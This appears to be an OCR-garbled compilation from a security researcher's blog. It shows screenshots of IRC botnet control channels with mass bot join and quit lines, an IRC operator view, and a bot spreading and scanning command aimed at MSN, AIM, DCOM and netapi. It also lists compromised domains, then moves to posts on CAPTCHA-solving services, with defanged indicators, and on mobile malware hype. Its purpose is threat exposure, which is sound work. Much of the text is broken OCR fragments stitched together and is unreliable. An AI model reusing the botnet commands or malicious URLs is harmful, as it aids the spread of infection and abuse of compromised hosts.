* [NO8/USA|11973] has quit IRC (Connection reset by peer) [oojarcjo = 

* [@B/ESP| 041421) has joined #tantt (eojarcye =~ 
* [MOO] ITA]76311} has joined #tantt [eojarcye 

* [NOO/ESP/68413] has joined #tantt (oojARG}e zr ae 
. |1TA|9@230) has joined Btantt [OB ARGIO = 
° |MEX|91648) has joined S#tantt (eajarcye a1] 

* (NGO) 1TA/32421) has joined #tantt [eojarcye 

* [@O/ESP|927221] has joined #tantt [eojarcye 

. [CAN|94844%) has joined #tantt [eojarcye 

. [MEX|42277] has joined #tantt [eojarcye 

* [00)MEX|439883) has quit IRC (Connection reset by peer) [eo;ARG)O 

* [MOOJESP|79205] has joined #tantt [eojarcye 

* [MO8/1TA]G3743} has quit IRC (Connection reset by peer) [O0);ARG]O 

* [88)USA/697629] has joined #tantt [eojarcye 

* [@OJESP|256594] has joined #tantt [eojarcye 

* [@O/ESP|/839191] has joined #tantt [OOjARG]1 

* [N@2]1TA]60991] has joined #tantt [@ojARG]1 

* [@O/ESP|77620%] has joined #tantt [OOjARG]1 

* [M@O]GRC|59461] has joined #tantt [@OjARG]1 

* [N81/GBR/ 19357} has joined #tantt [@ejARG]1 

* [MOBJESP|81942} has joined #tantt [OOjARG]1 

. has joined #tantt [OojARG|1 

* [MOOJESP|14892] has joined #tantt [OOjARG]1 

* [BO/ESP}392971} has joined #tantt [@ojARG]1 

* [M@O/COL| 49635] has joined #tantt [@OjARG]1 

* [80)/USA|731395} has joined #tanmtt [@ojARG]1 

* [MOBJESP|39744) has joined #tanmtt [@OjARG]1 

* [M@OJESP|47922] has joined #tantt [@OjARG]1 

* [MQ6/ESP|41569] has joined #tantt [@OjARG]1 

* [M@OJESP/34399] has joined #tantt [@OjARG]1 

* [NGO] 1TA|56103] has joined #tantt [@OjARG]1 

* [M@OJESP|33751] has joined #tantt [@O;ARGI1 

* [NG3/USA]81845} has quit IRC (Ping timeout) [OO] ARG]1 

* [MOB/ESP]65102} has quit IRC (Ping timeout) [OO] ARG|2 

* [MOOJESP|27406)] has joined #tantt [@OJARGI2 

* [@O/ESP|429733] has joined #tantt [@OjARGI2 

* [MOO] MEX] 05225] has joined #tantt v [OB] ARG|2 J 


unable to resolve 


USA | 00 | x? | SPO] 0089 
oo Kick 


USA/04| xP | P| 69929) 
ONS resolv 
. 
4 | xP | P| 69929) 


29) 


(USA) O4| xP /P|699729] 


[19:20] 
peer) 

[19:20] 
[19:28] 
[19:28] 
[19:20] 
(19:28) 
[19:20] 
peer) 

[19:20] 
[19:20] 
[19:20] 
peer) 

[19:20] 
[19:20] 
(19:21) 
[19:21] 
[19:21] 
[19:21] 
[19:21] 
[19:21] 
[19:21] 
[19:21] 
[19:21] 
(19:21) 
[19:21] 
[19:21] 


fie View Pavortes 


[19:20] * Joins: [80] 1SL|565888] 


* Quits: [00)USA| 109413] 


Joins: 
Quits: 
Joins: 
Joins: 
Joins: 
Quits: 


Quits: 
Joins: 
Quits: 


Quits: 
Joins: 
Joins: 
Joins: 
Joins: 
Quits: 
Joins: 
Joins: 
Quits: 
Joins: 
Joins: 
Joins: 
Quits: 
Joins: 


[ OO)EGY| 821514) 
[90] FRA| 908586] 
[ 90] NLD | 426835] 
(22|GBR| 782977} 
[ G4] USA| 100846} 
[ 90) GBR| 715230) 


[ 90] SWE [393501] 
[ Oj ESP [943461] 
[ 90] DNK | 308931] 


[90] USA|579187] 
[ 90) USA| 943275] 
[ 00) HUN| 366133) 
[ 00) USA|524698 } 
[ 02 | SWE [640262] 
[ 90) CZE| 790912] 
[ 80) MLD| 196825] 
[ 88] USA| 740516] 
[91] USA| 956383] 
[ 85 | SWE | 964080) 
[ 90) SWE | 609561] 
[ 90) CZE | 408619) 
[ 90) POL | 366470) 
[ 80] NOR [627427] 
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(COMPUTE " 82) 
(RUSSELL 


(Ping timeout) 


(ASUSQ67 
(DES-3882 ) (Co 
(ERSONGS 
(MOBIL@1 
(JKL 8188 


Ping 
Conner 


(TABLE6@: 
(PC119952 


ing timeout) 
253) 
) 


(Ping timeout) 


(HASEE 
(WAWEL@7 
(Error@s 
(WINGZ0 ) 
(ALEX-51 


23) 
ing timeout) 


(Ping timeout) 
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[ARG|XP]24498] 
[ARG|XP|30835] 
[ARG|XP [48299] 
[ARG|XP|52295] 
[AUS | US| 72846] 
[AUS | XP] 84859] 
[AUT US |63626] 
[BEL |XP|29920] 
[BEL |XP|77127] 
[BEL |XP|95798] 
[BGR|XP|98396) 
[BRA|XP| 09911] 
[BRA|XP| 07155] 
[BRA|XP| 09592] 
[BRA|XP| 16359] 
[BRA|XP|19394] 
[BRA|XP|24697] 
[BRA|XP|24863] 
[BRA|XP|26196] 
[BRA|XP [28674] 
[BRA|XP [93185] 
[BRA|XP [93643] 
[BRA|XP|39050) 
[BRA|XP| 41028) 
[BRA|XP| 44179) 


© [BRA[XP| 45895] 


[BRA XP |49906] 
[BRA|XP|58593] 
[BRA|XP|59544] 
[BRA|XP 163799] 
[BRA|XP|63904) 
[BRA|XP| 70447] 
[BRA|XP| 71007) 
[BRA|XP| 74217] 
[BRA|XP| 77077) 
[BRA|XP|80317] 

~ [BRA] XP 182646) 


ml» 


26105 


SC! eas rn x 
‘wl (@o|ZligaSalferesleesiaaiS0Sal2 
i LO Channels List 


ussaaasasasasenal aset oo a LEM TESPEXPIS4S5781 (HESU3D@190. 4) Quit (Ping timeout) » @tonix «+ 
sa t oo 

= @ Channek 2 [ARG|XP]2- 
(bac ' (ARG| XP] 4 

Ww Channels List r [AUS |xP|3 
' [BEL|XP]1 
; [BEL|XP|2 
[BEL|XP|3 
[BEL|XP|8 
[BGRIXP|9 

[BRA|XP| 
[BRA|XP| 8 
[BRA|xP}e 
[BRAIXP|1 
[BRAIXP|4 
; [BRAIXP|1 
; [BRA|XP|2 
[BRA|XP|2 
I" [BRA|XP|2 
; [BRA|XP|3 
[BRA|XP|3 
[BRA|XP|3 
[BRA|XP] 4 
, [BRAIXP]4 
r [BRAIXP|5 
! [BRAIXP|5 
[BRA|XP|5 
r [BRA|XP|7 
[BRA|XP|S 
[BRAIXP|8 
[BRA|XP|8 
r [BRA|XP|9 
[BRA|XP|9 
[BRAIXP]9 
[CANjUs|8 
[CAN|XP|2 
[CAN|XP|2 
= [CAN|XP|2 
[CAN] XPS 

= ~ [CAN] XP]S8 ~ 
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os lid fe -ho@-\8-\n- 
Net: 3 _ as 


ne all, 


boy] 
Ei] 


f ve [20118] [-cCmMasta¥): Ispread msn:sendfile -alm:sendfile -synscan: dcoml 35 asnt 35 -setthreads 130 


ADHeELL Met 
© U) Gurwels 


Bcybix say /clear 


Abjects 
= ©) Guerre: 
Netapl ite 
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- insider 


nn 


bt hhh bh bh 
annn 


ANTAHAAAAHNH 


nnn 


n 


ann 


4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
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[T) Fle Wew Fovortes Tools Commands Window Help =18) xj 


A @eVQ goog GSS RO GH\sT3/8 


[2K3] | 484 
[2K] | 9005 
[2K] | 0016 
[2K] | 0051 


[2K] | 0064 

[2K] | 0065 

[2K] | 9081 

[2K] | 8165 

[2K] | 8179 

[2K] | 0286 

[2K] | @374 

[2K] | 406 

[2K] | 849 

[2K] | 0481 

[2K] | 8497 

[2K] | @526 

[2K}| e531 

[2K] | e591 

[2K] | 8659 

[2K] | 0687 

[2K] | 8693 

[2K] | 8742 

* How talking = [2K] | 9760 

Topic is ‘#aduscan netapi 228 4% 8 -r -b -s ~a’ [2K] | 8765 

nm Sun Dec 10 O1:57:44 [2K] | 8806 

[2K] | 8822 

2 [2K] | 8885 

* [XP] | 45105568 joined [2K] | e899 

= [XP]] 837491168 joined [2K] | 949 

* [XP] ]82020998 joined [2K] | @974 

* [XP]]13536678 has joined [2K] | @982 

* [XP]]21795381 has joined [2K] | @999 

* [XP]]60989134 has joined [2K] | 1067 

* [XP]]18361395 has joined [2K] | 1067 

* [2K]]43655141 has quit IRC (Connection reset by peer) [2K] | 1968 

» [XP][50115591 has quit (Ping timeout) [2K] | 1078 

* [XP]]62097581 has joine [2K] | 1098 

* [XP]]46747223 has joined [2K] |] 1104 
* [2K]]66727403 has quit IR ng timeout) =) r2K1111722) 
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Tre View evertes Tock Commands Window Het> ay 
A @aO eG 008 08000 G05T3'8 
Dee ae! 


—=————r 7 
USA-@88]1X2eW0h/EMU| has joined 
ITA-@@8|PucT@AB| ITA] has quit IRC (Connection reset by peer) 


=) USA- OBB] SOSUTZ 
USA- SBE] SQsJpal jpery) 
USA~ OBB] SUASUCO| EM] My] 
pi USA- OBB] SuMDNIp | END] 
ITA-@88]d7K2ZPAy|1TAIN| has joined My USA~ OBB] Sy AAZ sec | ery] My 
L-@@@]UZJzEJRc|FROIM) has quit IRC (Ping tineout) USA- SOO] Sz2fhe 190 | CHM] 
A-@@9|UIVYUMOHI TTA] has quit IRC (Connection reset by peer) USA OBB] GAMOQHI | EMM | HM] 
“O00)VTEKT AS |CMU|H) has joined tm USA~ OBB] OF P mg | EMM | HM] 
EGY O88) pOOF Zar ARE IM) has quit IRC (fing tineout) USA~ O80] 6g0G212 | Chu) 
SUM O28] ouSThum| SLU] has quit IRC (Connection reset by peer) USA> BBG] 6GunG Teh | Cra) My) 
A-@@T/OBEYkPy| ITAL ha USA~@OG]S1ehuASK | CHM | Mt] 
888] Qnda6Unbe| SLUM] has quit IRC (Connection reset by peer) USA~ OBB] 6 juxav7 | Cra] My] 
000] kK2NF Irae] CHG |] USA> S08] St g50nI8 | CHM] 
W-@e@@] 7 fanaibK ashy ny USA~ OBB] 6oRKSs0| CHM | Ht] 
1TA-@@@] OOKawiz | ITA, ha USA~ OOO] SPSzaTOT | EMM] HM] 
A-@@@)ourh25P)1TA] has quit IRC (Software caused connection adert) USA~ SOG] GRFLEPAD | Era) | MH) 
SUM-@@@|A6ZHKTK|SLU|M] has quit IRC (Ping tineout) USA> SOB] 6SaZAtA| Era | I] 
FRA- 88] keI_IGGHIFRA, has joined USA~ SOB] ST IOXe9U | EHw | Hy 
1TA-@@@] CUJO6XU2 | ITAL MH) has fod USA~ O00] 6txOICg | EMM | Mt] 
ESP-080)H20urKe JESH|N| has joined USA- @8O| 6uAavATr | EM] 
Fitt-@e@|nphocak|FItiH] has quit 1 tion reset by peer) USA OBB] 6yCwF 7 | Era | My} 
1TA-@80)USHYRsge| TAIN) has joined USA- OBO] PIet 190E | EMM] My 
1TA-@@@/Ciferum|ITAIM] has quit IRC (Connection reset by peer) USA- OBO] P7AMVE Ux | EME | M] 
SUM-@@2|BUBnYyxXcJ|SLU|M] has quit IRC (Ping tineout) USA-@d0| Pa7EStal EM) 
HAU-@28| JDoxdalll |HRU/M] has quit IRC (Ping tineout) USA~ OBB] 764 fib IKY Ere | My] 
USA-@@8|2ppX9y9s|EMU/M] has quit IRC (Software caused connection adert) USA~ SOB] 7CpQRKADL | EM) 
ITA-@@8| y6cFauCUlITAIH) has quit IRC (Ping tineout) USA~ SOB) 7dwghC! | EH | My} 
1TA-@20)DtHE@GS/ITAIM) has foined USA-ObO| 7H2320u0| EMM | HM} 
SUH- O88] Urconend|SLU]H) has ae | USA-ObO] 70x IreA| EMI] My] 
ITA-@@@| kyCUSOUK|ITAIM) has quit 1 tion reset by peer) USA- S88] 7QQKOFSS| EMU) 
1TA-@@0|TkKiNSEL|ITA[H] has joined USA-@BO| 7EFOgKE | EMM] 
ITA-@@8|hAKap7cS|ITAIH) has quit IRC (Connection reset by peer) USA- SOO} 7Uipt7ad | EMU] 
1TA-@2/ELtZ0J3y|1TA} has foined USA-OBO| 7uTHRPAY EM | My] 
11-00) ThFUPAME ITA] has fod USA- OBO] 7XxXi yA | EM | M] 
1TA-@28|LSFGISE/ITAIM] has foined USA- 8B] 7ykAUOY | EMM | NM] 
SWE-@88|uEHs862|SUE|H| has joined USA- 880] 7¥Xy lwo | EMU] 
1TA-@88|CCUCi sus) ITA\H) has fod USA~ SBS) F2kngEO | Ere | My 
1TA-@88|poRsBsL1/1TA| has joined USA- 8G) BAOCEEN| EM) 
ITA-@@8|sWkI6qgo) ITA] has quit IRC tion reset by peer) USA-@80| B8XSSu77 | EMU) Mi) 
FRA-@88| eKtonEV|FRAIM] has quit IRC (Connection reset by peer) USA-OBG| SBRCSUY7 | EM) 
BIN-@88| 190g LDH] BSBIM] has quit IRC (Software caused connection abert) USA- 880] BcAmesed | EN | iM] 
SUH- 888] WH1EQG9|SLUIM] has quit IRC (Connection reset by peer) USA- SOO] BCESAJa| EMM | M4] 
HRU-@88|UGoxAKua|HRUIH] has quit IRC (Ping tineout) USA-8BB| BFSQOgXr | EMU] M] 
1TA-@8@|DEXISKILITTAIM] has quit IRC (Connection reset by peer) USA- S88] BFUqD2c | ENU| 
1TA-@88] @rPOCFNE| ITAL] has quit Ping tineout) USA- GBB] BHKHOAT w| EMU] 
1TA-@@8] IKEJDNOLITAIN] has foi USA-8BB| BKSOw7S [EMU | NM] 
1TA-988| SUFEBYzu) ITA] has quit 1 tware caused connection abort) USA- S88] BkATHgZa| EMU) 
SUM-@88| IpDISBJE|SLU| has joined USA-OB8] BLLunju7 [EMO] My] 
ITA-@@@|KUTHRGC|ITA] has quit IRC (Connection reset by peer) USA- S88] BiMBsVey | EM) M] 
ITA-@@@|MVEQCSE/ITA/H] has quit IRC (Connection reset by peer) USA- 888] BnggoCi S| EMU | My) 
SCO-888/oG@FUDTKISRLIM] has quit IRC (Ping tineout) USA- OBB] BO8eLXIG| EMD | MH] 
HLD-88@|XulesOH| NLD] has quit IRC (Software caused connection abert) USA- GBB] Boreyare | EN | | 
TTA-@8@|COut37 IVI TTAIN) has joined USA-OBB| 8S6zuk2 | EM] 
1TA-@88| UakBZUNG|ITAIH] has joi USA-8BB] Bsqyyshk | EMU] M] 
TTA-@8@| Se@VNZO/ TAH) has joined 800) 8UdngPas EMM 
SUN-@88|P3MKpToO|SLU(M] has joined 5 800) BWiywyly | EM] 
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centinela5177 
centinelal243 


centinelal768 
cent ine a9009 
centinela2542 
centinela4635 
centinela7432 
centinelase53 
centinels9363 
cent inela7i26 
centinel a9s27 
centanelass77 
cent inela2839 
centinela7967 
centinela479 
centinela2 186 
centinelaa973 
centinelaS316 
centinela5s11 
centinels9338 
centinel 276 
centinela2141 
centinela2616 
centinela7s34 
centinela2939 
cent inela2432 
centinela7643 
centinelass@ 
centinela$$82 


centinela74s4 
centinela7633 
centinelati23 


centinela426 has quit 
centinela4638 has quit (Ping timeout) 
centinel#938 has quit (Ping tameout) 


has quit (Ping 
has quit (Ping 


has quit (Ping 
has quit (Ping 
has quit (Ping 
has quit (Ping 
has quit (Ping 
has quit (Ping 
haxOrgfost 03 
hax@r@cpanel¢ 
hax0r@207.21€ 
hax0r€209. 8.2 
hax@r@server 
hax0r@64. 191 
hax0r@66. 197 
(haxOr@servers 
(haxOr@62.212 
h 2.212 


({hax0r@195. 62 
haxOr@server] 
(haxOr@srw4.om 
haxOr@dspnet 
(haxOr€213, 189 
(haxOr@cube. bl 
has quit (Pinc 
haxOr@web3. we 
(hax0r@69.5. 64 
has quat (Pinc 


centinela681 has quit (Ping 


has quit (Pinc 
hax0r@83. 149 
(hax0r@69. 56.1 
haxOr@kili. de 


timeout} 
timeout) 


(Ping tameout) 


timeout) 

timeout) 

timeout) 

timeout} 

timeout) 

timeout) 
web. com) has joined 
dnet.com) has joined 
19) has join 
has joined 
net) has joined @ 
5) has joined 


1) has joined 

catedusa. com) has joined eae? 
has joined 
has joined 

has joined 

has joined 


slive.net) has joined GD 


met. net) has joined 
org) has joined 
has joined a 


has joined 
ut) 


ource. net) has jolted - 
nied! ll! 


ut) 

t) 

ut) 
has joined 
has joined # 


De | —! 


ee 070 


centinela5154 has quit (Ping timeout) 
centinela4345 has quit (Ping timeout) 


i 4 ops, 1967 total 


centinelal074 
centinelal083 
centinelal087 
centinelol0BB 
centinelal089 
centinelal095 
centinelal099 
cemtinelal102 
centinelal 109 
centinelall18 
centinelal122 
centinelel125 
centinelall26 
centinelal13 

centinelol 134 
centinelal135 
centinelel137 
centinelal139 
centinelal 140 
centinelel1S3 
centinelall54 
centinelal 156 
centinelol 164 
cemtinelal167 


centinelall7 


ma mtin nha DSM 


Governaent, RIAA, ANTI-Piracy & Related Groups: By entering, you are violating 
code 431.322.12, Internet Privacy Act signed by Bill Clinton in 1995 
Therefore you CANNOT threaten cur ISP(s), persons) or companyls) storing 
these file(s) or using this network and cannot prosecute 

Please leave this network maw as you are violating cur Teras Of Use & Service 


sets 

| sets sode 
sets sode 

| sets sode 
sets node 

| Sets wode +9 
sets sode +h 
sets sode +a 
sets wode +A 
sets sode +5 
sets sode oN 
sets sode Ww 
sets sode +H h 
sets sode +t h 
sets sode *p h 


You are nav an IRC Operator 

QERNTD File is sissing 

There are @ users and 74901 invisible on 1 servers 
3 :channels foreed 

I have 74991 clients and | servers 

Current Local Users: 74901 Max; 79074 

Current Global Users: 74901 Max: 70274 
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PUTS EL © CEP [Pe Seer eee 
[85250] © [CMO [DORP bas quit (Cliewt exited) 
[S8o5@] = (CO | eRe han (Conmwction reset by peer) 


[etose] + (Cpe 
{etose] + (Cpe 
{etese] + (epee 
{etese) + (epee 
{rtesey + cep 
{rtesey © cep 
ievese] © CLpHe 
(etese] = Cee 
[etese] = (Cpe 
[ttose] = (Cpe 
{ttcse) = Ce jre 
{ttcse) = Ce jre 
{eebe) + (epee 
{etese] © Cope 
{enesey + cep 
[eese) + (Cpe 
ienesey © Cope 
[eiese) © cep 
(etose] * (Cpe 
{ftose] © (epee 
{ttcse) + Ce je 
{ttose] + (tp 
{ttese) © Ce pee 
{ttese) © Ce pee 
{etese) © (Cpe 
ietese) © cep 
ietese) = Cpe 
[eeese) © (Cpe 
(etese] = (Cpe 

+ (te 
{etose) = (Cpe 
{tecse] + (epee 
{stehe) + Ce pre 
{esesay + Ce pee 
[etess) © Cee 
[etess) © cep 
[eses) © cep 
[ites] © (epee 


quit TRC (CLiewt enttes) 
qeit IC (Cliewt exited) 


{etoss) = Cope jeinee 
{ttoss) = Cope jeinee 
{stcst) © (epee quit IRC (Clivat exited) 
{ttost} © cep jainee 
{ttesa) © Cope qeit IRC (Chiewt exited) 
{enenty © cep jebece 
{UTCST] © [CPO INET? Bes quae tee sat exited) 


[NUCST] © [LIMO [ TAOS Ras jokers 
ieuess) © CO 
[8tes4) = (Cpe 
(shes) = Cee 
{etest) = Cope 
{ttes4) + (Cpe 
{steht} © Ce pee 
[88059] © [Ej [FEES Bas jeknee 


ties reset by peer) 
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(UsB)ruoxyfgn: [Version] 
[UsB]itdpjkfe: [Version] 
(UsB]dphcprdn: [Version] 
(UsB]tkjvhcdx: [Version] 
(UsB Jopnafrkb ([Yersion] 
(UsB]aldsiwmb: [Version] 
(UsB )urlfnaj [Yersion] 
(UsB]yqevujgn: [Version] 
(UsB]bbxoocrwu: [Version] 
(UsB )ytwethx [Yersion] 
(UsB ]hhqkdua [Yersion] 
(UsB]sewitahl: [Version] 

[Version] 

[Yersion] 

[Version] 

[Version] 
(UsB)ctdslii ([Yersion] 
(UsBjerbshiea: [Version] 
[UsB Jovrquxg [Version] 
(UsB] fcdtxjy (Yersion] 
(UsB]geytnost: [Version] 
[UsB )dhpkuga [Yersion] 
(UsB )krdcefh (Yersion] 
(UsB]taerxhi [Version] 
(UsB)snpakarq: [Version] 
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(to | tee 
ct je_j emer 
(te jew 
(to jews 
(tj eee 
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Ce pep eens 
Ce jo_jenee 
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ct pep eees 
(to jane 
Ct [no jerk 
ct po jerte 
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ce pe_jenre 
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(UsB Jaghnahpt 
(UsB]agtckujn 
([UsBjagtiznth 
(UsB jahatlwac 
(UsB)aicsnyhr 
[UsB]aigyutip 
(UsB)ajdgbbri 
[UsB jakun jdfe 
(UsBjaldsiumb 
(UsB jamhuobhn 
[UsB janpphbul 
[UsB ]apwafkzt 
(UsB]asfFjole 
(UsB]aszceifp 
(UsBjatfnyzea 
(UsB )]avnyqxgr 
[UsB]axucapre 
([UsB]ayulyzyp 
(UsB ]bbahbxdy 
[UsB ]bbhzqFhd 
[UsB]bbuetbqj 
(UsB ]bbxoocrw 
[Us8 jberdount 
[UsB ]bczysfee 
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downingfarms .com/bestacti0n 
eminfinity.com .au/amalzingclips 
eminfinity.com .au/uncensOredshOw 
endurancesportscar .com/extrimemOvies 
epicent .dk/publicfilm 

evaracollin .be/mmyfilms 

exceleronmedical .com/amalzingclips 
exceleronmedical .com/c0OlperfOrmans 
exceleronmedical .com/privalettube/?youtube.com 
finolog .com/privalemOvie 

fitslim .com/fantasticdemOnstratiOn 
gacogop .org/fuunnyclips 

gamlabodens .se/privaletw 
garagedoorsnow .com/meggademOnstratiOn 
garlicworld .com/mmym0Ovie 


garlicworld .com/uncensOredperfOrmans 


gcillustration .com/extrimevideO 

germanamericantax .com/publicm0vie 
happyholidaychristmastrees .com/uncensOredperfOrmans 
horaexata.com .br/cOOlclip 

huffmanfarms .com/fantasticfilms 

imagequest360 .com/fantasticmOvies 

inartdesigns .com/extrimevideO 


interception .dk/mmyttube 
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65. 
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67. https://blogger.googleusercontent . com/img/b/R29vZ2x1/AVvXsEhJBLK6SA_zaeQW8IWaLft5_szjalRRMqJQprDhd49COi 
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a03upuqdhhVCidGWxqz4bZAlIyNAyQfQE750Ji2-q7Qg0wzLiHcqz-Tq 
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18.10.30 CAPTCHA is Dead! - Here’s the Proof (2022-10-28 09:58) 


[1] 


CAPTCHA CAPTCHA CAPTCHA 
CAPTCHA IMAGE SOLVED SOLVED SOLVED 
CORRECT INCORRECT INCORRECT 


CAPTCHA 


DESCRIPTION 


Type everything, \ ie) 
as shown in the ~i eat 
image. Y > or | 


4 1 | 
MiX, cAse cael 
ean Sie 7 thE big aPple | aPple | Big apple 


2 words number 
and small case B51) bfhre $5.1 baseline $.1 baseline 5.1 BASELINE 


captcha 


jou are what 
¥ 7” You are what You eat 


ALL BIG r = 
arte ae ee || an 8) FXENO Fxfno fxfm0 
2 words small orleray . 
ante capicha MhHEQR cateway subjest Cateway Subject Cateway subject 
with space, t ; T 

I i 
ln “aa lary necessary trujilio Necessary Trujillo necessary Trujillo 
Numbers captcha) OQ 7 72 O 07720 07720 772 
Alphabet and 
number senall 3ala79 3gia79 3giatd 
case captcha 
ALL BIG CASE 
CAPTOHAS aR AY K- 630K G3dk 30K 
with numbers " 
MIX caSe 
CaptcHa ee Y gf 3xvy8F 3xvysF 3xvvet 
with Numbers a _* 
ALL BIG CASE “2; { 
CAPTCHAS ow Ne x CWB8KXNA CwBkxna cWEKxna 
with numbers Xv 
No image with ey eae Te 
Tem hexesls0! | ? abed ~“2re"! 


second timer 


| Do not type any word ] Do not type any word } 


EMOTICONS i) 2) i) re A) ? OF emoticons of icons | of emoticons or kons 


ete. | ete 


Puzzle 


Wiss 


CAPTCHAs that ~"] pantie eg Clicking only one Clicking other things 
{1) RV image that are not a RV 
you need to vehicles (RV) 
click on 
20 = 
ania == ? Do not type any thing | Do mot type any thing 
may 
Rend a } 1 for these captcha for these captcha 
Unable to read oy one 
captcha only type “?” and only type “?" and 
— ? press Enter press Enter 


Dear blog readers, 


It’s a public secret that the majority of today’s modern Web sites rely on the use of CAPTCHA for 
proper user vs bot or automated software detection which in reality is a flawed and an outdated 
approach to protect a Web site and its visitors as in 2022 we continue to live in a world where 
CAPTCHA-solving as a service that also includes reCAPTCHA solving as a service continues to 
proliferate with possible thousands of users across the globe processing hundreds of thousands 
of CAPTCHAs courtesy of popular CAPTCHA services for the purpose of empowering Russian or 
international cybercriminals on their way to properly and automatically register new accounts 
on major Web properties and social networks internationally. 


In this post I’ll detail the activities of several known CAPTCHA-solving services and discuss 
in-depth their functionalities with the idea to raise awareness on the concept including the 
systematic and automatic CAPTCHA solving courtesy of humans and their affiliate-based 
networks. 
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Sample URLs known to have been involved in the campaign include: 


hxxp://captchasolver.com - 69.172.201.208; 52.73.71.92; 52.73.115.80; 172.64.138.13; 
172.67.184.21 


hxxp://captchaocr.com - 172.93.194.59; 172.93.194.58; 3.130.204.160; 103.224.212.221; 
3.19.116.195 


hxxp://typethat.biz - once executed the sample phones back to hxxp://5fc.info - 
184.168.192.116; 45.40.164.140; 209.99.40.222; 208.91.199.225; 50.62.160.53 


Sample MD5 known to have been involved in the campaign include: 
MD5: eblef93dcf2e9fd747ea2b80dd0c2619 

Related URLs known to have been involved in similar campaigns include: 
hxxp://captchasolver.com/ 

hxxp://216.55.132.15/captchas 
hxxp://64.34.161.26:8888/type/typer.html 
hxxp://panel.6ew.pl/index.php 
hxxp://www.geocities.com/workcaptcha/magic.bolobomb.htm 
hxxp://magic.bolobomb.com/lepricon/index.php 
hxxp://www.geocities.com/workcaptcha/destination.work.htm 
hxxp://nagic.bolobomb.com/lepricon/index.php?A=STATS 
hxxp://www.destination-server.com/bulletinpics/entry.cgi 
hxxp://www.destination-server.com/bulletinpics/server-slow.cgi 
hxxp://74.55.167.90:8546/entry/type.php? 
hxxp://www.lovecolony.com/captchasetup.exe 
hxxp://www.captchaocr.com/human/index.php 
hxxp://bpoworld.awardspace.com/ 


Stay tuned! 


1. https: //blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEg3vMtTSIrooEMg4YQwc1zF1k50F5Y_2uVEV75Edq0aCP_8 
1RKOnQ8hkfhJI3VxMEx1BXCVdngFkrQoblwznwszYVZmxYUw9v1BU1iq 


18.10.31 Mobile Malware - Hype or Threat? - An Analysis (2022-10-28 09:58) 


[1] 
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New Mobile Malware 
3,500,000 
3,000,000 
2,500,000 


2,000,000 


O 


1,500,000 
1,000,000 
Q3 Q4 Q1 Q2 Q3 Q4 


2019 2020 


NOTE: 
| wrote this article in 2006. 


You've definitely witnessed the ongoing speculations on whether or not mobile malware repre- 
sents the type of threat some vendors got accused of hyping. Malware authors have this unique 
position to follow the trend, understand when an approach gets mature enough to think of how 
to reset it, and then all of a sudden completely shift their techniques - which results in P2P, 
IM, Email, and yes, Skype as the "next big thing" on the malware scene type of weekly media 
articles. 


It’s all cyclical, and not a rocket science needing a reverse engineer to explain and dazzle you 
with advanced Assembly experience. 


There are incentives for malware authors to code mobile malware, namely the 
commercialization of mobile malware itself, which happened in the middle of 2006 with the 
release of the RedBrowser. Among the key point | indicated in my "[2]Malware - Future 
Trends" research that | released in the beginning of 2006. The ugliest things are the easiest to 
emerge as always. 


The very nature of a mobile phone’s voting and purchasing power, let’s not mention could 
literally provoke your imagination on the possible abuses. 


Why would an end user start asking a mobile operator’s representative on the availability of 
mobile anti virus scanners? Because he or she would have been a victim the art of market 
development, viral 


The industry’s main points: 


- more people have mobile phones then they own a personal computer - which doesn’t mean 
they’re all smart phones running Symbian or Windows Mobile 


- over 300 generically detected malware samples, reminds of the concept of a malware family 
in PC malware world. These are all the Cabir family, soread to code on the Internet and have 
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ordes of script kiddies fueling the FUD while watching Takedown and inspiring themselves to 
eavesdrop on someone's mobile communication while "commuting" in the park 


The reality 


- Anti virus vendors suffer from marketing myopia, they’ve simply fallen in love with their 
products, and we all know that once you fall in love it’s hard to become as pragmatic as you 
used to be before - sweet pain 


- the majority of known mobile malware comes out of a Cabir Proof of Concept (PoC) publicly 
available code, that is the spreading routine within. Namely the current threat represents 
nothing more than a mobile malware family, and there’s no such thing as a perfect family 


- Malware authors are too busy to efficiently play cat and mouse game and taking advantage 
of the about to reach 1B world wide Internet population. 


- the end user MUST confirm the unknown Bluetooth connection, if she’s in discoverable 
mode, must confirm the execution of the executable from unknown source 


- given that Symbian and Windows Mobile dominate the mobile OS space, a vulnerability in 
the systems is crucial 


- Anti virus signatures are basically a reactive security protection 


| once argued on the myth of anti virus vendors sharing every malware sample they came 
across, in between the "usefulness" of virus signatures in today’s open source malware, and 
malware on demand world 


How to protect yourself? 
- be aware of the basics of mobile malware 
- don’t install applications from untrusted on-the-go sources 


Do you need a personal anti-virus scanner for your mobile phone? No, you don’t, but mobile 
operators need them on the gateway level, the rest is just your mobile operator 
differentiating its offering, positioning itself as a conscious one, and further fueling growth 
into the market - whether revenues are about to get spent on further R &D on mobile 
malware, or market development with other products is up to the vendors themselves. 


It’s your network operator who should be responsible for limiting the spread of potential 
epidemics, and charging a buck for a slight modification of Cabir’s PoC spreading module, 
brings us back to the same old issue with open source malware, or malware of demand and 
anti virus signatures usefulness and recency of updates. My point, the responsibility for 
dealing with general and family based mobile malware, the one we’re seeing today, should go 
to my mobile operator, not to myself getting infected and spreading the decease even further. 


The average mobile phone user would start enjoying a provider’s brand even more, if he’s 
been talked into the huge dangers posed by mobile malware - from a marketing point of view 
he would even spread the word further while trying to let the other perceive him/her as a tech 
savvy individual with a fancy AV scanner on his couple hundred. 


Targeted attacks have a huge potential though, while a mass sending of mobile malware 
would result in the mobile operator directly blocking it, and merely relaying on the end user 
to take care of their responsibilities. All you need is a wide spread mobile malware 
dissemination attempt, and then you'll witness your operator using his ownership powers to 
shock and awe you with its know how. 
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Wise investments are not always those that seems the most proactive ones, but the ones 
taking advantage of the momentum. 


Remember, the best marketers don’t just respond profitably to the consumer’s needs, they 
create new markets. It’s the unspoken rule of the game. 


What’s next? Anti virus software for your gaming device and music player, as well as for your 
IPv6 compatible fridge? For sure, but in the very, very long run. Meanwhile, be aware, don’t 
panic, and try to base your concerns on objective and unbiased sources only. 


Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEggyJSyTadSKfkRvHRkwwYw18qnGDrd9g4F zy jSwhUWGPZS8 
pOXOBMMvA6uAiWYAOuDYpeSVDajRkKRKHA48J_xqKDIK5NebsTC14v0 
2. https://archive.org/download/malware-trends/malware-trends. pdf 


18.10.32 Exposing a Portfolio of YaBucks Pay Per Install Affiliate Network Scareware 
Serving Domains - An Analysis (2022-10-28 13:29) 


[1] 


Your title here 


